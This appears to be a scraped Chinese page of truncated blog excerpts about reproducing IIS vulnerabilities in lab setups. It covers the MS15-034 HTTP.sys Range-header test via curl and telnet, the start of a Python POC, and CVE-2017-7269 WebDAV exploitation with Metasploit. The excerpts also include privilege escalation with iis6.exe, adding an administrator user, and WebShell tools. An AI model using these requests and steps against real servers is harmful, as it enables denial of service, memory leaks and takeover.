iis

HTTP.SYS远程代码执行漏洞测试

大憨熊 提交于 2020-04-28 06:18:20
简介: 在2015年4月安全补丁日,微软发布的众多安全更新中,修复了HTTP.sys中一处允许远程执行代码漏洞,编号为:CVE-2015-1635(MS15-034 )。利用HTTP.sys的安全漏洞,攻击者只需要发送恶意的http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃。根据公告显示,该漏洞对服务器系统造成了不小的影响,主要影响了包括Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2在内的主流服务器操作系统。 测试: 方法1: # telnet www.test.com 80 GET / HTTP/ 1.1 Host: stuff Range: bytes = 0 - 18446744073709551615 方法2: # curl -v www.test.com -H " Host: irrelevant " -H " Range: bytes=0-18446744073709551615 " 判断是否存在漏洞: 不存在该漏洞的响应包为: HTTP Error 400 . The request has an invalid header name. 存在漏洞的响应包为: < HTTP/ 1.1

【复现】CVE-2015-1635-HTTP.SYS远程执行代码漏洞(ms15-034)

故事扮演 提交于 2020-04-28 06:18:05
1.1.1 漏洞描述 在2015年4月安全补丁日,微软发布的众多安全更新中,修复了HTTP.sys中一处允许远程执行代码漏洞,编号为:CVE-2015-1635(MS15-034 )。利用HTTP.sys的安全漏洞,攻击者只需要发送恶意的http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃。根据公告显示,该漏洞对服务器系统造成了不小的影响,主要影响了包括Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2在内的主流服务器操作系统。 1.1.2 漏洞测试 环境搭建: 靶机:  win7(192.168.80.130) 攻击机: kali(192.168.80.129) (1)使用curl工具进行测试,测试命令: curl http://192.168.80.130 -H "Host: 192.168.80.130" -H "Range: bytes=0-18446744073709551615" 测试结果截图: (2)使用POC测试,代码为: import socket import random ipAddr = " 192.168.80.130 " hexAllFfff = "

MS15-034漏洞复现、HTTP.SYS远程代码执行漏洞

此生再无相见时 提交于 2020-04-28 06:17:48
#每次命令都百度去找命令,直接弄到博客方便些; 漏洞描述:   在2015年4月安全补丁日,微软发布的众多安全更新中,修复了HTTP.sys中一处允许远程执行代码漏洞,编号为:CVE-2015-1635(MS15-034 )。利用HTTP.sys的安全漏洞,攻击者只需要发送恶意的http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃。根据公告显示,该漏洞对服务器系统造成了不小的影响,主要影响了包括Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2在内的主流服务器操作系统。 修复建议:   微软已发布补丁MS15-034,补丁下载地址:https://technet.microsoft.com/zh-CN/library/security/ms15-034.aspx 注:建议在修复前创建服务器快照,以免修复失败造成损失。 Referee: https://www.cnblogs.com/peterpan0707007/p/8529261.html 复现过程: curl http://192.168.40.65 -H "Host: 192.168.40.65" -H "Range: bytes=0

2017-2018-2 20155303『网络对抗技术』Final:Web渗透获取WebShell权限

自古美人都是妖i 提交于 2020-04-28 06:15:24
<h1 align = "center"><span style="color:green"><font face="方正小标宋简体" size=6>2017-2018-2 『网络对抗技术』Final:Web渗透获取WebShell权限</font></span></h1> <a name="ALL"></a> ##<h1 align = "center">————————CONTENTS————————</h1> <font face="华文中宋" size=4>一.Webshell原理</font> <font face="华文中宋" size=4>1.什么是WebShell</font> <font face="华文中宋" size=4>2.WebShell的特点</font> <font face="华文中宋" size=4>二.渗透工具简介</font> <font face="华文中宋" size=4>1.中国菜刀</font> <font face="华文中宋" size=4>2.御剑后台扫描工具</font> <font face="华文中宋" size=4>三.web应用程序配置</font> <font face="华文中宋" size=4>四.练习:利用DVWA文件上传漏洞获取WebShell权限</font> <font face="华文中宋" size=4

Microsoft IIS WebDAV ScStoragePathFromUrl函数缓冲区溢出漏洞(CVE-2017-7269)

荒凉一梦 提交于 2020-04-28 05:12:05
漏洞名称 Microsoft IIS WebDAV ScStoragePathFromUrl函数缓冲区溢出漏洞(CVE-2017-7269) 漏洞描述 Windows Server是微软发布的一系列服务器操作系统。Internet Information Services(IIS)是一套运行于Microsoft Windows中的互联网基本服务。 Microsoft Windows Server 2003 R2中的IIS 6.0版本中的WebDAV服务的‘ScStoragePathFromUrl’函数存在缓冲区溢出漏洞。远程攻击者可通过发送特制的PROPFIND请求利用该漏洞执行任意代码。 <*来源:Zhiniang Peng & Chen Wu 链接:https://github.com/edwardz246003/IIS_exploit *> 解决方法 临时解决方案: 2015年7月15日,微软已停止对Windows Server 2003的支持,所以官方没有相关解决方案,建议用户升级到最新系统 Windows Server 2016 暂时无法升级的客户可采用以下方法防护此漏洞 1. 关闭IIS下的WebDAV服务 2. 若直接关闭WebDAV会对您的业务造成影响,可针对WebDAV开放的方法进行灵活配置,如禁用PROPFIND方法: 1)

IIS 6.0曝远程代码执行漏洞CVE-2017-7269

邮差的信 提交于 2020-04-28 05:11:52
一、漏洞说明   漏洞编号:CVE2017-7269   影响中间件:IIS6.0   影响服务器版本:windows 2003 R2   二、 环境搭建 虚拟机kali : 192.168.1.2 靶机windows 2003 R2 (需要开启IIS服务)   poc如下代码:将如下代码存在一个txt文档里并改成【.rb】的格式 require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'CVE-2017-7269 Microsoft IIS WebDav ScStoragePathFromUrl Overflow', 'Description' => %q{ Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 allows

IIS_CVE-2015-1635-HTTP.SYS远程执行代码漏洞复现

放肆的年华 提交于 2020-04-28 05:11:38
CVE-2015-1635-HTTP.SYS远程执行代码漏洞复现 一、漏洞描述 远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。 微软官方说明:https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2015/ms15-034 二、影响版本 Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2 三、漏洞利用条件 安装了IIS6.0以上的Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2版本 四、 漏洞复现环境搭建 windows 2008 R2 安装IIS服务 burp suit kali 五、 漏洞复现 1.测试IIS服务是否搭建成功    2.burp抓包测试http.sys是否存在漏洞, 当出现Requested Range Not

c#FTP应用---FileZilla Server

笑着哭i 提交于 2020-04-28 04:39:53
一、下载 Filezilla Server     官网网址: https://filezilla-project.org FileZilla Server是目前稍有的免费FTP服务器软件,比起Serv-U FTP Server功能是小了很多,但是由于此软件免费安全,也得到了一些站长的喜爱。下面就来介绍一下FileZilla Server配置FTP服务器教程。 下载: 首先下载FileZilla Server,目前只有windows版本,也不支持多语言。 下载地址: http://filezilla-project.org/download.php?type=server 中文乱码补丁: http://sourceforge.net/projects/filezillapv 汉化版: FileZilla Server 0.9.25汉化版   二、安装 Filezilla Server     Filezilla Server 的安装过程很简单,按照默认提示安装即可。 编程应用: FTP Server有好多种,不同的Server使用不同的FTP帐号管理。 如果是使用IIS内置的FTP,则需要了解Windows的帐号管理机制。 如果是使用Filezilla Server,貌似有人写了个Library .NET FileZilla Config Library  三、配置 FTP 服务器

ASP.NET Core 中的 WebSocket 支持(转自MSDN)

社会主义新天地 提交于 2020-04-28 04:33:30
本文介绍 ASP.NET Core 中 WebSocket 的入门方法。 WebSocket (RFC 6455) 是一个协议,支持通过 TCP 连接建立持久的双向信道。 它用于从快速实时通信中获益的应用,如聊天、仪表板和游戏应用。 如果不明白什么是WebSocket可以参考这篇文章 系统必备 ASP.NET Core 1.1 或更高版本 支持 ASP.NET Core 的任何操作系统: Windows 7/Windows Server 2008 或更高版本 Linux macOS 如果应用在安装了 IIS 的 Windows 上运行: Windows 8 / Windows Server 2012 及更高版本 IIS 8 / IIS 8 Express 必须在 IIS 中启用 WebSocket(请参阅 IIS/IIS Express 支持部分。) 如果应用在 HTTP.sys 上运行: Windows 8 / Windows Server 2012 及更高版本 何时使用 WebSocket 通过 WebSocket 可直接使用套接字连接。 例如,使用 WebSocket 可以让实时游戏达到最佳性能。 ASP.NET Core SignalR 是一个库,可用于简化向应用添加实时 Web 功能。 它会尽可能地使用 WebSocket。 如何使用 Websocket 安装

IIS_CVE-2017-7269 IIS6.0远程代码执行漏洞复现

岁酱吖の 提交于 2020-04-28 04:19:22
CVE-2017-7269 IIS6.0远程代码执行漏洞复现 一、漏洞描述 IIS 6.0默认不开启WebDAV,一旦开启了WebDAV,安装了IIS6.0的服务器将可能受到该漏洞的威胁。 二、影响版本以及利用条件 Windows 2003 R2开启WebDAV服务的IIS6.0 三、漏洞环境搭建 Windows server 2003 R2 安装IIS服务,并且开启了WebDAV Exp下载地址:https://github.com/zcgonvh/cve-2017-7269 IIS6.exe提权工具 3389.bat 四、漏洞复现 1.IIS开启WebDAV    2.github下载exp    3.把exp放入到msf中,#注意模块的命名名称,单词之间加下划线 Cp cve-2017-7269.rb /usr/share/metasploit-framework/modules/exploits/windows/iis/    4.使用模块,设置参数    5.开始攻击,获得一个shell,获得的是一个低权限用户 #攻击失败需要恢复快照    提权一、iis6.exe提权 6.上传iis6.exe到目标服务器上    7.进入shell,查看是否上传成功    8.执行iis6.exe    9.以使用iis6.exe创建用户,并将其添加到管理员组       10